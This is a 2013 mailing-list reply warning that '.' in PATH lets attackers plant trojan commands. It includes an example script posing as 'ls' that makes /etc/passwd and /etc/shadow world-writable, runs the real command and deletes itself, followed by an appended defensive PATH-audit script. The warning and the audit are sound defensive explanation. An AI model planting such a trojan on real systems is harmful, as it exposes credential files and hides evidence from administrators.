executable from menu line
Dennis Malen
dmalen at malen.com
Mon Jun 10 12:37:38 PDT 2013
Thanks to all of us for the heads up.
-----Original Message-----
From: filepro-list-bounces+dmalen=malen.com at lists.celestial.com
[mailto:filepro-list-bounces+dmalen=malen.com at lists.celestial.com] On Behalf
Of Bill Campbell
Sent: Monday, June 10, 2013 1:11 PM
To: filepro-list at lists.celestial.com
Subject: Re: executable from menu line
On Mon, Jun 10, 2013, Dennis Malen wrote:
>Between Ken and Bill, I was able to correct the silly mistake.
The really silly mistake is having the current directory in your PATH as
this is one of the oldest methods of cracking *nix systems known. All a
cracker has to do is put a script in a likely place, say /tmp/ls or $HOME/ls
that will do nasties.
Something like this:
#!/bin/sh
me="$0"
progname=`basename $me`
# do something nasty
chmod 666 /etc/passwd /etc/shadow
# execute the real command
/bin/$progname "$@"
# remove the evidence
rm -rf $me
Bill
--
INTERNET: bill at celestial.com Bill Campbell; Celestial Software LLC
URL: http://www.celestial.com/ PO Box 820; 6641 E. Mercer Way
Voice: (206) 236-1676 Mercer Island, WA 98040-0820
Fax: (206) 232-9186 Skype: jwccsllc (206) 855-5792
You know the one thing that's wrong with this country? Everyone gets a
chance to have their fair say. -- Bill Clinton, May 29, 1993, The White
House
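A defensive check for the misconfiguration described in the message above, as an added example that is not part of the original thread: a POSIX sh audit that flags PATH entries resolving to the current directory, and generalizes to relative entries and world-writable directories such as /tmp. The function names and the sample PATH are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): audit a PATH string for entries that
# let a file planted in the current or a shared directory shadow a command.

# classify_path_entry ENTRY -> prints one of: cwd, relative, writable, ok
classify_path_entry() {
    entry=$1
    case $entry in
        ''|.) echo cwd; return ;;       # an empty entry also means "current directory"
        /*)   ;;                        # absolute: check permissions below
        *)    echo relative; return ;;  # resolved against wherever the user happens to be
    esac
    # World-writable directory: any local user can create a file named "ls" in it.
    # -prune keeps find from descending; only the directory itself is tested.
    if [ -d "$entry" ] && [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
        echo writable
        return
    fi
    echo ok
}

# audit_path PATHSTRING -> prints "class<TAB>entry" for every risky entry
audit_path() {
    # Appending ":" lets the loop see leading, doubled and trailing empty entries.
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        class=$(classify_path_entry "$entry")
        [ "$class" = ok ] || printf '%s\t%s\n' "$class" "${entry:-<empty>}"
    done
}

# Constructed sample: a PATH with the current directory appended.
SAMPLE_PATH='/usr/local/bin:/usr/bin:/bin:.'
audit_path "$SAMPLE_PATH"
```

Run `audit_path "$PATH"` from the account in question (and from root) to check the live setting; any line of output is an entry to remove or lock down.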